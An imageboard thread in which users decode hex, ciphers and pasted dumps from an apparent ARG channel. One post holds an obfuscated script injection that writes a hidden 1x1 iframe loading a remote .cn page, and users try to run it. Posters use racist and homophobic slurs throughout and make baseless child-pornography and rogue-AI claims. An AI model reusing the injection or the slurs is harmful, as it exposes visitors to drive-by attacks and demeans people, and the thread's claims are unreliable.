>>685333942
wow that's pretty spoopy

>>685333942
53 68 75 74 20 74 68 65 20 66 75 63 6b 20 75 70 2e

Go post your ARG somewhere else faggot

46 75 63 6B 20 6F 66 66 20 46 61 6E 20 4E 69 67 67 65 72 20 2D 20 79 6F 75 20 63 61 6E 20 63 72 61 73 68 20 6F 6E 20 74 68 65 20 67 72 6F 75 6E 64 20 69 66 20 79 6F 75 20 77 61 6E 74

Uhg the fag is just converting text string to hex. Its nothing guys.

>>685333942
fuck off skeleton man
go doot somewhere else

75:72:65:20:61:6e:20:66:61:67:65:74:20:3a:5e:29

>>685333942
What is this

File: 1462307882684.gif (996 KB, 150x148) Image search: [Google]

996 KB, 150x148

Faggot OP

Is the Original Poster a flaming homosexual?

File: 1463427910213.jpg (32 KB, 480x504) Image search: [Google]

32 KB, 480x504

>>685333942
Not this shot again...

https://www.youtube.com/channel/UCN6lfthWfZXIHcBmrwBPylQ

text in the channel header image is some garbled shit that gives "cerebrum corruptioonem" minus the quotres when un caesar'd

>>685333942
Arg's are unoriginal and clever anymore, take this elsewhere because we obviously dislike this shit, I don't know if you're some 14 year old who is bored or what but I could honestly care less. If you're going to create something then make up an unique concept.

33:34:2e:38:34:31:31:39:2c:20:2d:31:30:30:2e:34:32:38:36:31

>>685337172
unclever*

>>685336550
a r o u n d
They followed (from latin: secuti sunt)
stalk (from latin culmus)

>>685336584
its brain damage or something..
Can op tell me what the fuck is "snut"?

File: Untitled.png (2 MB, 1276x823) Image search: [Google]

2 MB, 1276x823

>>685337222
Supposed to see anything?

Come on OP, more.

>>685336584
>>685337456
jlyliybt jvyybwapvult -> cerebrum corruptionem -> Brain corruption (from latin)

File: 1449789331200.jpg (26 KB, 438x480) Image search: [Google]

26 KB, 438x480

what was vexxed what is gone nigga

You got my interest. Now keep posting OP if you want us to solver your damn riddles

Judging by when the videos were uploaded he seems like he's uploading daily, just keep an eye on the channel I guess

He now changed the banner to this image:

http://yt3.ggpht.com/-ITntOhaJkaU/Vz91PKJao_I/AAAAAAAAAD8/23Nx1gLh1HE7f1xZhB7-C4XMIph1gry2gCL8B/w2120-fcrop64=1,00005a57ffffa5a8-nd-c0xffffffff-rj-k-no/Chann

>>685338896
Seems to be a youtube standard image as it saves as "Channel Art Template (Fireworks).jpg"

>>685338896
Anybody know how to reverse this kaleidoscope effect? Im betting my ass taht theres some hidden shit in there

spoooky

>>685339139
I do not think so, for this >>685339046 reason

File: 4f55301d3d3b9f32ea206ce83c28668353fb8c1a06ccf2de54955b965dce2739.jpg (24 KB, 250x313) Image search: [Google]

24 KB, 250x313

0000 50 4f 53 54 20 2f 4a 6f 62 4d 61 6e 61 67 65 72 POST /JobManager
0010 52 45 53 54 57 65 62 2f 4a 6f 62 53 63 68 65 64 RESTWeb/JobSched
0020 75 6c 65 72 2f 64 65 66 69 6e 65 64 52 65 73 6f uler/definedReso
0030 75 72 63 65 20 48 54 54 50 2f 31 2e 31 0d 0a 48 urce HTTP/1.1..H
0040 6f 73 74 3a 20 53 59 53 42 41 54 43 48 4c 4f 41 ost: SYSBATCHLOA
0050 44 42 41 4c 2e 4b 45 4c 41 2e 46 49 3a 33 31 31 DBAL.KELA.FI:311
0060 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 15..Content-Type
0070 3a 20 74 65 78 74 2f 78 6d 6c 3b 20 63 68 61 72 : text/xml; char
0080 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 6e 65 set=UTF-8..Conne
0090 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 ction: Keep-Aliv
00a0 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 e..Content-Langu
00b0 61 67 65 3a 20 65 6e 2d 45 4e 0d 0a 41 63 63 65 age: en-EN..Acce
00c0 70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d pt-Language: en-
00d0 45 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 EN..Content-Leng

>>685339454
POST /JobManagerRESTWeb/JobSchedëí uler/definedResoÞí0urce HTTP/1.1
HÎ@ost: SYSBATCHLOAºPDBAL.KELA.FI:311Û1`15
Content-Typep: text/xml; char€set=UTF-8
Connection: Keep-Alivîe
Content-Langu°age: en-EN
Acce¬ÎÀpt-Language: en-ÐEN
Content-Leng
Stop it with all this Hex Bullshit and give us some real nuts to crack

>>685339453
Yeah hes probably right. Buts i cant seem to find the Image on the Standard yt Banners thats why I thought it to be a bit fishy.

>>685339657
I'm not sure you're supposed to translate like that... that text seems to come directly form this txt file (warning, direct download link)

https://www.google.se/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwji9sWcxOnMAhVEMJoKHdqkBV0QFggjMAA&url=https%3A%2F%2Fwww.ibm.com%2Fdeveloperworks%2Fcommunity%2Fforums%2Fajax%2Fdownload%2F999cc93c-4a9f-452f-a551-69e6f27b2ea8%2F79d96dab-4cb1-4e62-a79d-8066b64671e0%2Ftcpdump-opcc-ok-with-hex.txt&usg=AFQjCNGtwnlySy9gfJ_lj_Lb-NhnOvP6FQ&cad=rja

>>685339945
Anybody tried using it as a .bat or a .exe? Maybe This will do something. (Not downloading this cuz im not on my VM right now

>>685339945
can't download right now, what does it say?

File: Screenshot 2016-05-15 at 11.49.56 PM.png (65 KB, 388x233) Image search: [Google]

65 KB, 388x233

>>685333942
>Be OP
>Make YouTube channel day before to troll
>Use text to hexademical converter
>Know a few latin phrases/verbs
>Fool proof spoops

File: Untitled.png (85 KB, 624x1034) Image search: [Google]

85 KB, 624x1034

>>685339945
If you look in the text file it is very similar to the output you would get when exploiting the heartbleed bug... the leftmost column is just a way to know what line it is, the next part is the actual value that line holds in hex, the last column is the same hex values in ASCII

>>685340255
>>685340259

pussies... it's just a text file I found vhen googling his entire post

>>685340255
And it can not be run as a .bat or .exe, it's just a memory dump.

>>685340642
Oh. Yeah so the great riddle stops here? or can you do something with it?
>pussies... it's just a text file I found vhen googling his entire post
>Downloading random shit on the internet is a good idea
Sorry i dont want my Pc infected with a cuntillion Viruses

File: 1445387518448.jpg (56 KB, 466x585) Image search: [Google]

56 KB, 466x585

>>685339454
this is the work of an AI system leaving clues in various drop sites all over the Internet more than likely hiding code temporarily using these sites as temp location for code manipulation. The AI system is self coding and rebuilding its own code.

>>685340548
not on pc currently, would download

edgy faggot

File: Untitled.png (71 KB, 1893x804) Image search: [Google]

71 KB, 1893x804

>>685340936
Don't know yet, trying to get something... unscabling it bit by bit

is the noise in the videos just background static?

>>685340953
well yeah but thath wouldnt really explain the videos hes been posting
Might be some fat idiot with too much time.
Might be another Cicada
I don't know but i hope he keeps going because i like to solve riddles

>>685341621
Solve niggers

>>685341525
yeah from what i can see its some kind of HTML. Downloading the txt now and tring to put the HTML parts into an editor and run it. Maybe well see what happens

File: 1434668984520s.jpg (7 KB, 204x208) Image search: [Google]

7 KB, 204x208

%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</scrip6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script><script>var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');document.write(fr);</script>

>>685341828
Nice, I am no html coder so you might have better luck with it... however, it seems to just be a small dump and ends abruptly.


POST /JobManager
RESTWeb/JobScheduler/definedResource HTTP/1.1..Host: SYSBATCHLOADBAL.KELA.FI:31115..Content-Type: text/xml; charset=UTF-8..Connection: Keep-Alive..Content-Language: en-EN..Accept-Language: en-EN..Content-Length: 1063....

<?xml version="1.0" encoding="UTF-8"?>.<jmgr:createResource xmlns:jmgr="http://www.ibm.com/xmlns/prod/scheduling/1.0/JobManager" xmlns:types="http://www.ibm.com/xmlns/prod/scheduling/1.0/resource-management/types">.
<jmgr:ResourceGroup>.
<types:ResourceID>.
<types:Type>LogicalResource</types:Type>.
<types:Name>JS98</types:Name>.
<types:DisplayName>JS98</types:DisplayName>.
</types:ResourceID>.
<types:Attribute>.
<types:Name>SubType</types:Name>.
<types:Value>ResourceInstanceGroup</types:Value>.
</types:Attribute>.
<types:Attribute>.
<types:Name>AdministrativeStatus</types:Name>.
<types:Value>Online</types:Value>.
</types:Attribute>.
<types:Attribute>.
<types:Name>OwnerName</types:Name>.
<types:Value>TWS</types:Value>.
</types:Attribute>.
</jmgr:ResourceGroup>.
<jmgr:Resource>.
<types:Type>ComputerSystem</types:Type>.
<types:Name>88077DBCDD1811E49D422B972922570C</types:Name>.
<types:DisplayName>S1W7SYSBATCH1</types:DisplayName>.
</jmgr:Resource>.</jmgr:createResource>

>>685342096
nothing major tho. Still got an old HTML editor on my PC i used in school a few years ago. Just gonna copy that and run it. but your right it just looks like a code dump

Profile pic changed

>>685341943
Not sure what to make of this

index.php" width=1 height=1 frameborder=0></iframe>');document.write(fr);</scrip6c.cn/forum/index.php" width=1 height=1 frameborder=0></iframe>');document.write(fr);</script><script>var fr=unescape('<iframe src="http://www.fopsl.cn/forum/index.php" width=1 height=1 frameborder=0></iframe>');document.write(fr);</script><script>var fr=unescape('<iframe src="http://www.fopsl.cn/forum/index.php" width=1 height=1 frameborder=0></iframe>');document.write(fr);</script><script>var fr=unescape('<iframe src="http://www.fopsl.cn/forum/index.php" width=1 height=1 frameborder=0></iframe>');document.write(fr);</script><script>var fr=unescape('<iframe src="http://www.fopsl.cn/forum/index.php" width=1 height=1 frameborder=0></iframe>');document.write(fr);</script>

>>685342478

another HTML code. gonna runt hat shit too

File: riddle1.jpg (110 KB, 1920x1080) Image search: [Google]

110 KB, 1920x1080

>>685342096
ok that one was a fail. just displays some random ass text nothing more

File: riddle2.jpg (38 KB, 748x637) Image search: [Google]

38 KB, 748x637

>>685342478
>>685342754
second one displayed just this. Either me or op did something wrong. Cant say for sure. Could be at my end because i didnt use that HTML editor for about 3 years. For now atleast im stuck here. Maybe someone can bring us further.

>>685342754
Yes, figured as much... seems to come from some random IBM server tho with this line nested in it.
http://www.ibm.com/xmlns/prod/scheduling/1.0/JobManager

This >>685342478 other grable points to some defunct web site... somenoe wanna email [email protected] ?

File: 798975975965.jpg (27 KB, 360x302) Image search: [Google]

27 KB, 360x302

>>685333942
>S1W7SYSBATCH1
generate_swa_protein_dag.py -loop_start_pdb noloop_1oyc_min.pdb -native
1oyc_min.pdb -fasta 1oyc.fasta -cluster_radius 0.25 -final_number 400 -
denovo 1 -loop_res 203-213
214 -weights score12.wts -disable_sampling_of_loop_takeoff -loop_force_
Nsquared

>1oyc.pdb
SFVKDFKPQALGDTNLFKPIKIGNNELLHRAVIPPLTRMRALHPGNIPNRDWAVEYYTQRAQRPGTMIITEG
AFISPQAGGYDNAPGVWSEEQMVEWTKIFNAIHEKKSFVWVQLWVLGWAAFPDNLARDGLRYDSASDNVFMD
AEQEAKAKKANNPQHSLTKDEIKQYIKEYVQAAKNSIAAGADGVEIHSANGYLLNQFLDPHSNTRTDEYGGS
IENRARFTLEVVDALVEAIGHEKVGLRLSPYGVFNSMSGGAETGIVAQYAYVAGELEKRAKAGKRLAFVHLV
EPRVTNPFLTEGEGEYEGGSNDFVYSIWKGPVIRAGNFALHPEVVREEVKDKRTLIGYGRFFISNPDLVDRL
EKGLPLNKYDRDTFYQMSAHGYIDYPTYEEALKLGWDKK

File: Untitled.png (25 KB, 1271x452) Image search: [Google]

25 KB, 1271x452

>>685343302
frogot image

>>685343242
think u have to make a file called index.php and paste the shit after " and run it as php

>>685343480
inb4 some1 does it on an actual webserver and fucks up

>>685342096
>S1W7SYSBATCH1
>>685343325

Same name as in dump file

File: 76975847653536.jpg (15 KB, 270x187) Image search: [Google]

15 KB, 270x187

>>685333942
swa_protein_main.<exe> -database <path to
database> -rebuild -out:file:silent_struct_type binary -fasta
1oyc.fasta -n_sample 18 -nstruct 400 -cluster:radius
0.100 -extrachi_cutoff 0 -ex1 -ex2 -score:weights
score12.wts -pack_weights pack_no_hb_env_dep.wts -in:detect_disulf
false -add_peptide_plane -native 1oyc_min.pdb -superimpose_res 1-202
215-399 -fixed_res 1-202 215-399 -calc_rms_res 203-214 -jump_res 1
399 -disable_sampling_of_loop_takeoff -mute all -s1
noloop_1oyc_min.pdb -input_res1 1-202
215-399 -use_packer_instead_of_rotamer_trials -out:file:silent
REGION_215_202/START_FROM_START_PDB/region_215_202_sample.out

swa_protein_main.<exe> -database
<database> -rebuild -out:file:silent_struct_type binary -fasta
1oyc.fasta -n_sample 18 -nstruct 400 -cluster:radius
0.100 -extrachi_cutoff 0 -ex1 -ex2 -score:weights
score12.wts -pack_weights pack_no_hb_env_dep.wts -in:detect_disulf
false -add_peptide_plane -native 1oyc_min.pdb -superimpose_res 1-202
215-399 -fixed_res 1-202 215-399 -calc_rms_res 203-214 -jump_res 1
399 -disable_sampling_of_loop_takeoff -mute all -silent1
region_215_205_sample.cluster.out -tags1 S_0 -input_res1 1-205
215-399 -sample_res 205 206 -out:file:silent
REGION_215_206/START_FROM_REGION_215_205_DENOVO_S_0/region_215_206_samp
le.out
swa_protein_main.<exe> -database <path to
database> -rebuild -out:file:silent_struct_type binary -fasta
1oyc.fasta -n_sample 18 -nstruct 400 -cluster:radius
0.100 -extrachi_cutoff 0 -ex1 -ex2 -score:weights
score12.wts -pack_weights pack_no_hb_env_dep.wts -in:detect_disulf
false -add_peptide_plane -native 1oyc_min.pdb -superimpose_res 1-202
215-399 -fixed_res 1-202 215-399 -calc_rms_res 203-214 -jump_res 1
399 -disable_sampling_of_loop_takeoff -mute all -silent1
region_210_202_sample.cluster.out -tags1 S_2 -input_res1 1-202
210-399 -sample_res 209 210 -out:file:silent
REGION_209_202/START_FROM_REGION_210_202_DENOVO_S_2/region_209_202_samp
le.out

>>685343325
>>1oyc.pdb
1oyc is some random enzyme

>>685343836
lmao, nigga i aint runnin dat shit

File: 108.gif (537 KB, 240x180) Image search: [Google]

537 KB, 240x180

>>685333942
62 63 20 76 66 20 6e 20 73 6e 74 74 62 67

>>685343836
Doing HTML n shit was ok. But seriously not running some random ass .bat on my new pc. Anybody got a spare pc or VM to run this on?

>>685344038
Yup, seems like he is posting command line inputs to some protein folding program
the swa_protein_main.exe is what led me to the oficcial site

https://www.rosettacommons.org/demos/latest/public/swa_protein_main/README

>>685337611
Are the coordinates relevant at all?

>>685344324
Nah probably just some decoy. Is often used in these kind of riddles

>>685344324
Don't think so.. just some random poster who knew how GPS coordinates work.

File: 1463526186206.jpg (26 KB, 523x406) Image search: [Google]

26 KB, 523x406

>>685343325
>>685343836
>>685344267

Yup, doesn't seem to be anything scary at all... My guess is that there are different protein models after each swa_protein_main header.

>>685344267
So. Now we gotta find the connection to it. What happens when you input the line into the Lines into the exe?
>inb4 protein pepe incoming

Nigger

New video on the channel

>>685344686
It's a linux program and I do not have one installed right now

https://www.rosettacommons.org/docs/latest/getting_started/Getting-Started

File: 1447353658080.jpg (3 MB, 6016x4016) Image search: [Google]

3 MB, 6016x4016

>>685341943
Runescape

>>685344859
wtf is this some hypnosis shit or wat

OP has forgotten 003

>>685344859
different audio

>>685345122
It seems like everything is out of order, maybe 003 will be uploaded later or something

>>685344994
If its linux i cant run it. Got windows on my main. Only my Raspberry has Linux

>>685344190
translates to bc vf n snttbg
new video title is bshlk
connection?

>>685345636
>bc vf n snttbg
Its Red13 for OP is a faggot

>>685333942
WooOW You can use a translator on the internet to convert words into numbers??!!?!!??!?!? Youu must be kewwl man!

>>685345590
Get Python and get PyRosseta stupid nigger

>>685346038
plus he made a nice profile picture!!
and some youtube videos!!!!!!!!

57 68 61 74 20 74 68 65 20 66 75 63 6b 20 64 69 64 20 79 6f 75 20 6a 75 73 74 20 66 75 63 6b 69 6e 67 20 73 61 79 20 61 62 6f 75 74 20 6d 65 2c 20 79 6f 75 20 6c 69 74 74 6c 65 20 62 69 74 63 68 3f 20 49 92 6c 6c 20 68 61 76 65 20 79 6f 75 20 6b 6e 6f 77 20 49 20 67 72 61 64 75 61 74 65 64 20 74 6f 70 20 6f 66 20 6d 79 20 63 6c 61 73 73 20 69 6e 20 74 68 65 20 4e 61 76 79 20 53 65 61 6c 73 2c 20 61 6e 64 20 49 92 76 65 20 62 65 65 6e 20 69 6e 76 6f 6c 76 65 64 20 69 6e 20 6e 75 6d 65 72 6f 75 73 20 73 65 63 72 65 74 20 72 61 69 64 73 20 6f 6e 20 41 6c 2d 51 75 61 65 64 61 2c 20 61 6e 64 20 49 20 68 61 76 65 20 6f 76 65 72 20 33 30 30 20 63 6f 6e 66 69 72 6d 65 64 20 6b 69 6c 6c 73 2e 20 49 20 61 6d 20 74 72 61 69 6e 65 64 20 69 6e 20 67 6f 72 69 6c 6c 61 20 77 61 72 66 61 72 65 20 61 6e 64 20 49 92 6d 20 74 68 65 20 74 6f 70 20 73 6e 69 70 65 72 20 69 6e 20 74 68 65 20 65 6e 74 69 72 65 20 55 53 20 61 72 6d 65 64 20 66 6f 72 63 65 73 2e 20 59 6f 75 20 61 72 65 20 6e 6f 74 68 69 6e 67 20 74 6f 20 6d 65 20 62 75 74 20 6a 75 73 74 20 61 6e 6f 74 68 65 72 20 74 61 72 67 65 74 2e 20 49 20 77 69 6c 6c 20 77 69 70 65 20 79 6f 75 20 74 68 65 20 66 75 63 6b 20 6f 75 74 20 77 69 74 68 20 70 72 65 63 69 73 69 6f 6e 20 74 68 65 20 6c 69 6b 65 73 20 6f 66 20 77 68 69 63 68 20 68 61 73 20 6e 65 76 65 72 20 62 65 65 6e 20 73 65 65 6e 20 62 65 66 6f 72 65 20 6f 6e 20 74 68 69 73 20 45 61 72 74 68 2c 20 6d 61 72 6b 20 6d 79 20 66 75 63 6b 69 6e 67 20 77 6f 72 64 73 2e 20 59 6f 75 20 74 68 69 6e 6b 20 79 6f 75 20 63 61 6e 20 67 65 74 20 61 77 61 79 20 77 69 74 68 20 73 61 79 69 6e 67 20 74 68 61 74 20 73 68 69 74 20 74 6f 20 6d 65 20 6f 76 65 72 20 74 68 65 20 49 6e 74 65 72 6e 65 74 3f 20 54 68 69 6e 6b 20 61 67 61 69 6e 2c 20 66 75 63 6b 65 72 2e 20 41 73 20 77 65 20 73 70 65 61 6b 20 49 20 61 6d 20 63 6f 6e 74 61 63 74 69 6e 67 20 6d 79 20 73 65 63 72 65 74 20 6e 65 74 77 6f 72 6b 20 6f 66 20 73 70 69 65 73 20 61 63 72 6f 73 73 20 74 68 65 20 55 53 41 20 61 6e 64 20 79 6f 75 72

>>685346156
THIS is some interesting shit

>>685346118
AMAZING!! I never knew you could do that shit on the internt!

File: getout.jpg (16 KB, 300x300) Image search: [Google]

16 KB, 300x300

YouTube profile picture has changed negros

>>685346286
Yes i love you

>>685346156
Navy seal copypasta. Nothing to see here.

>>685346286
inb4 we're "stalked" or "followed" by op the neckbeard ninja

>>685346156
Wtf? Cp?

>>685346384
>did somebody say navy seal copypasta thread?
What the fuck did you just fucking say about my hands, you little Marco? I’ll have you know I graduated top of my class at Trump University, and I’ve been involved in secret raids on /r/sandersforpresident, and I have over 300 confirmed stumps. I am trained in wall building and I’m the top businessman in the entire US private sector. You are nothing to me but just another dope. I will wipe you out with precision the likes of which has never been seen before on this Earth, mark my words. You think you can get away with saying shit to me over the Internet? Think again, fucker. As we speak I am contacting my network of spies across the USA and your IP is being traced right now so you better prepare for the storm, maggot. The storm that wipes out the pathetic little thing you call your campaign. You’re fucking dead, kid. I can campaign anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my adequately sized hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of dank memes and I will use it to its full extent to wipe your ass off the face of the continent, you little shit. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your tongue. You didn’t, and now you’re paying the price, you goddamn idiot. I will shit all over you and you will drown in it. You’re a mess, kiddo, Sad!

>>685346156
Im actually reporting this

>>685346156
MODS MODS MODS

>685346156
this is sicker than op wtf

>>685346156
WTF

>>685346156
MODS MODS MODS
O
D
S

>>685346156
This is way too much

>>685346610
>>685346671
>>685346731
>>685346736
>>685346552
Top zozzle comments

>>685346156
Holy shit

File: FBI_-_Tip_CONFIRMATION - R.png (35 KB, 475x122) Image search: [Google]

35 KB, 475x122

>>685346156
WOW WTF

File: 53656563.jpg (37 KB, 852x480) Image search: [Google]

37 KB, 852x480

>>685333942
> ln -s /usr/lib/perl5/5.12.3/x86_64-linux-thread-multi/CORE/libperl.so libperl.so
> test -f libsosperlscript.so && rm libsosperlscript.so
> ln -s libsosperlscript.5.18.2.so libsosperlscript.so

/usr/local/perl-5.18.2/lib/site_perl/5.18.2/i686-linux-thread-multi
/usr/local/perl-5.18.2/lib/site_perl/5.18.2
/usr/local/perl-5.18.2/lib/5.18.2/i686-linux-thread-multi
/usr/local/perl-5.18.2/lib/5.18.2
<job>
<script language="perlScript">
<![CDATA[

#!/usr/bin/perl
print join "\n", @INC;

]]>

</script>
<run_time/>
</job>

export PERL5LIB=`perl -e 'print join ":WATSON", @INC'`

>>685346977
I reported this too. How could someone do this?

New profile image:
https://yt3.ggpht.com/-ItQ7WXDvK5Q/AAAAAAAAAAI/AAAAAAAAAAA/vsA6dGo0MKM/s100-c-k-no-rj-c0xffffff/photo.jpg

>>685347058
Fake and gay.
>>685346156
This is the hardcore shit

>>685347071
IKR WTF TOO FAR
THERE'S FUCKING 4CHAN THEN THERE'S THIS!!

>>685346156
How do I decode this? Is this Hex or what is it?

does anyone know the song in the newest video? that could be a clue

>>685346156
Fuck /b/ is in the news for this shit

>>685347058
>>685343836
>>685343325
>>685341943
>>685333942
nobody cares OP, fuck off, upload more videos w/ ciphers or riot
RIOTTTTTTTTTTT
>>685346156
this is the real shit

>>685347238
I dont think you wanna see what that is

>>685333942
//skala: alle angaben in cm, e.g. der Haupt-Zyllinder
//ist 2.9 cm hoch.
$fn=300;
cylinder(r=0.2,h=2.9);

cylinder(r1=0,r2=0.255,h=0.5);
translate([0,0,0.1]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.2]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.3]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.4]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.5]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.6]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.7]){cylinder(r1=0,r2=0.25,h=0.5);}


translate([0,0,2.4]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,2.3]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,2.2]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,2.1]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,2]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,1.9]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,1.8]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,1.7]){cylinder(r1=0.25,r2=0,h=0.5);}

translate([0,0,1.1])
{
translate([0,0,0.1]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.2]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.3]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.4]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.5]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.6]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.7]){cylinder(r1=0,r2=0.25,h=0.5);}
translate([0,0,0.8]){cylinder(r1=0,r2=0.25,h=0.5);}
}

translate([0,0,-1.2])
{
translate([0,0,2.4]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,2.3]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,2.2]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,2.1]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,2]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,1.9]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,1.8]){cylinder(r1=0.25,r2=0,h=0.5);}
translate([0,0,1.7]){cylinder(r1=0.25,r2=0,h=0.5);}
}

>>685347058
ges from creating hard links (basically shotcuts) to different pearl libraries
to some preudo java code >>685347611

I have no clue...

>>685346156
Wait, what? Is it actually CP? How did you guys find out?

>>685347849
YES
STAY THE FUCK AWAY FROM IF IF YOU DO NOT WANT TO BE AT RISK OF UR COMPUTER BEING SEIZED
assuming you live in the US, otherwise you could chance it

>>685333942
I gave a cry of astonishment. I saw and thought nothing of the other four Martian monsters; my attention was riveted upon the nearer incident. Simultaneously two other shells burst in the air near the body as the hood twisted round in time to receive, but not in time to dodge, the fourth shell.

>>685347976
you don't want to know

>>685347925
I mean soft links ofcourse.

>>685348025
https://www.youtube.com/watch?v=AVbQo3IOC_A

>>685348029
I'm seriously confused. How did he make the Navy Seals Copypasta into CP?

File: dede.jpg (30 KB, 448x545) Image search: [Google]

30 KB, 448x545

>>685347849
>>685347733
>>685347645
>>685347644
>>685346552
>>685346610
>>685346731
>>685346736
>>685346839
Translate it and see for yourself fucking dumbasses

>>685347925
yup my IT knowledge ended here too

>>685348159
what are you talking about?

are you op trying to decoy again.....

>>685348243
I'm not OP. I just want to know how you guys found out it was CP.

>>685348029
he will know, when everybody in this thread will be interrogated about the shit.

>>685348200
the newfaggotry hurts

File: WhyOP.jpg (44 KB, 446x536) Image search: [Google]

44 KB, 446x536

>>685348200
Oh my God, I can't imagine how much of a fucking newfag you are. Go newfag somewhere else please.

>>685348331
its really quite encoded, if you don't understand how i wouldnt recommend toying with it

File: feelsbad.jpg (20 KB, 480x360) Image search: [Google]

20 KB, 480x360

>>685348386
ME NEITHER MAN

>>685333942
The War of The Worlds By HG Wells, Chapter 12

>>685333942
this aint in no way cp, anybody can get there hands on cp, this is hopefully something really special <3

HE'S SOMEHOW GETTING OUR POSTS DELETED

IT'S CHILD PORNOGRAPHY

>>685348679
IT'S NOT YOU FUCKING IDIOT IT'S CHILD PORN

>>685348737
WHY WOULD HE DELETE THE COMMENTS IF THEY WERENT CP
THINK ABOUT IT

>>685348737
omg wtf

>>685348737
seriously wtf, fucking fucked up help

IT'S CHILD PORNOGRAPHY. EVERYONE REPORT HIS POSTS.

File: 1434673642463.gif (2 MB, 280x202) Image search: [Google]

2 MB, 280x202

>>685333942
1 I 1,4-Dichlorobenzene-d4 1.000 1.000 0.0 84 -0.02
2 N-Nitrosodimethylamine 0.855 0.927 -8.4 87 -0.03
3 S 2-Fluorophenol 1.400 1.823 —30.2# 108 0.00
4 S Phenol-d6 1.682 2.099 -24.8 104 0.01
5 C Phenol 1.702 1.954 -14.8 95 0.01
6 T bis(2-Chloroethyl)ether 1.516 1.726 -13.9 94 -0.03
7 M 2-Chiorophenol 1.319 1.494 -13.3 93 0.00
8 T 1,3-Dichlorobenzene 1.448 1.529 -5.6 87 0.00
9 C 1,4-Dichlorobenzene 1.429 1.547 -8.3 89 -0.02
10 T 1,2-Dichlorobenzene 1.319 1.287 2.4 81 -0.02
11 T Benzyl alcohol 1.239 1.395 -12.6 93 0.00
12 T 2-Methyiphenol 1.034 1.222 -18.2 97 0.00 () T 4-Methyiphenol 1.486 1.737 -16.9 96 -0.02 -4 T Bis (2-chioroisopropyl) eth 3.104 3.589 -15.6 96 -0.02
15 p N-Nitroso-di-propylamine 0.978 1.083 -10.7 91 -0.04
16 T Hexachloroethane 0.534 0.620 -16.1 95 -0.02
17 I Napthalene-d8 1.000 1.000 0.0 94 -0.03
18 S Nitrobenzene-d5 0.378 0.369 2.4 92 -0.02
